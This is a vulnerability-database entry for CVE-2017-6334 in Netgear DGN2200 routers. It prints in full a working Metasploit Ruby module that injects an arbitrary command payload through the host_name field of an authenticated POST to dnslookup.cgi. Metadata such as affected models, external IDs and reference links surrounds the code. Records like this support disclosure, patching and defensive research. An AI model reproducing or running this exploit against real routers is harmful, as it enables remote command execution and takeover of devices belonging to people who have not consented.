ID
VAR-E-201702-0148
CVE
| cve_id: | CVE-2017-6334 | Trust: 2.3 |
EDB ID
42257
TITLE
Netgear DGN2200 - 'dnslookup.cgi' Command Injection (Metasploit) - CGI remote Exploit
Trust: 0.6
DESCRIPTION
Netgear DGN2200 - 'dnslookup.cgi' Command Injection (Metasploit). CVE-2017-6334 . remote exploit for CGI platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | netgear | model: | dgn2200 | scope: | - | version: | - | Trust: 1.6 |
| vendor: | netgear | model: | dgn2200 dnslookup.cgi | scope: | - | version: | - | Trust: 0.5 |
| vendor: | netgear | model: | dgn2201 dnslookup.cgi remote | scope: | eq | version: | v1/v2/v3/v4 | Trust: 0.5 |
| vendor: | netgear | model: | dgn2200v4 | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | netgear | model: | dgn2200v3 | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | netgear | model: | dgn2200v2 | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | netgear | model: | dgn2200v1 | scope: | eq | version: | 0 | Trust: 0.3 |
EXPLOIT
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'net/http'
require "base64"
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => "Netgear DGN2200 dnslookup.cgi Command Injection",
'Description' => %q{
This module exploits a command injection vulnerablity in NETGEAR
DGN2200v1/v2/v3/v4 routers by sending a specially crafted post request
with valid login details.
},
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Author' => [
'thecarterb', # Metasploit Module
'SivertPL' # Vuln discovery
],
'DefaultTarget' => 0,
'Privileged' => true,
'Arch' => [ARCH_CMD],
'Targets' => [
[ 'NETGEAR DDGN2200 Router', { } ]
],
'References' =>
[
[ 'EDB', '41459'],
[ 'CVE', '2017-6334']
],
'DisclosureDate' => 'Feb 25 2017',
))
register_options(
[
Opt::RPORT(80),
OptString.new('USERNAME', [true, 'Username to authenticate with', '']),
OptString.new('PASSWORD', [true, 'Password to authenticate with', ''])
])
register_advanced_options(
[
OptString.new('HOSTNAME', [true, '"Hostname" to look up (doesn\'t really do anything important)', 'www.google.com'])
])
end
# Requests the login page which tells us the hardware version
def check
res = send_request_cgi({'uri'=>'/'})
if res.nil?
fail_with(Failure::Unreachable, 'Connection timed out.')
end
# Checks for the `WWW-Authenticate` header in the response
if res.headers["WWW-Authenticate"]
data = res.to_s
marker_one = "Basic realm=\"NETGEAR "
marker_two = "\""
model = data[/#{marker_one}(.*?)#{marker_two}/m, 1]
vprint_status("Router is a NETGEAR router (#{model})")
model_numbers = ['DGN2200v1', 'DGN2200v2', 'DGN2200v3', 'DGN2200v4']
if model_numbers.include?(model)
print_good("Router may be vulnerable (NETGEAR #{model})")
return CheckCode::Detected
else
return CheckCode::Safe
end
else
print_error('Router is not a NETGEAR router')
return CheckCode::Safe
end
end
def exploit
check
# Convert datastores
user = datastore['USERNAME']
pass = datastore['PASSWORD']
hostname = datastore['HOSTNAME']
vprint_status("Using encoder: #{payload.encoder} ")
print_status('Sending payload...')
vprint_status("Attempting to authenticate with: #{user}:#{pass} (b64 encoded for auth)")
creds_combined = Base64.strict_encode64("#{user}:#{pass}")
vprint_status("Encoded authentication: #{creds_combined}")
res = send_request_cgi({
'uri' => '/dnslookup.cgi',
'headers' => {
'Authorization' => "Basic #{creds_combined}"
},
'vars_post' => {
'lookup' => 'Lookup',
'host_name' => hostname + '; ' + payload.encoded
}})
end
end
Trust: 1.0
EXPLOIT LANGUAGE
rb
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
'dnslookup.cgi' Command Injection (Metasploit)
Trust: 1.0
TAGS
| tag: | exploit | Trust: 1.0 |
| tag: | Metasploit Framework (MSF) | Trust: 1.0 |
| tag: | remote | Trust: 0.5 |
| tag: | cgi | Trust: 0.5 |
CREDITS
Metasploit
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2017-6334 | Trust: 2.3 |
| db: | EXPLOIT-DB | id: | 42257 | Trust: 1.6 |
| db: | EDBNET | id: | 93311 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 143128 | Trust: 0.5 |
| db: | PACKETSTORM | id: | 141337 | Trust: 0.5 |
| db: | BID | id: | 96463 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2017-6334 | Trust: 2.0 |
| url: | https://github.com/rapid7/metasploit-framework/blob/4fdd77f19aefd02368a237a1d22f2b58c4fa496f/modules/exploits/linux/http/netgear_dnslookup_cmd_exec.rb | Trust: 1.0 |
| url: | https://www.exploit-db.com/exploits/42257/ | Trust: 0.6 |
| url: | http://www.netgear.com | Trust: 0.3 |
SOURCES
| db: | BID | id: | 96463 |
| db: | PACKETSTORM | id: | 143128 |
| db: | PACKETSTORM | id: | 141337 |
| db: | EXPLOIT-DB | id: | 42257 |
| db: | EDBNET | id: | 93311 |
LAST UPDATE DATE
2022-07-27T09:11:33.383000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 96463 | date: | 2017-03-07T01:08:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 96463 | date: | 2017-02-26T00:00:00 |
| db: | PACKETSTORM | id: | 143128 | date: | 2017-06-24T17:45:41 |
| db: | PACKETSTORM | id: | 141337 | date: | 2017-02-26T05:55:55 |
| db: | EXPLOIT-DB | id: | 42257 | date: | 2017-06-26T00:00:00 |
| db: | EDBNET | id: | 93311 | date: | 2017-06-26T00:00:00 |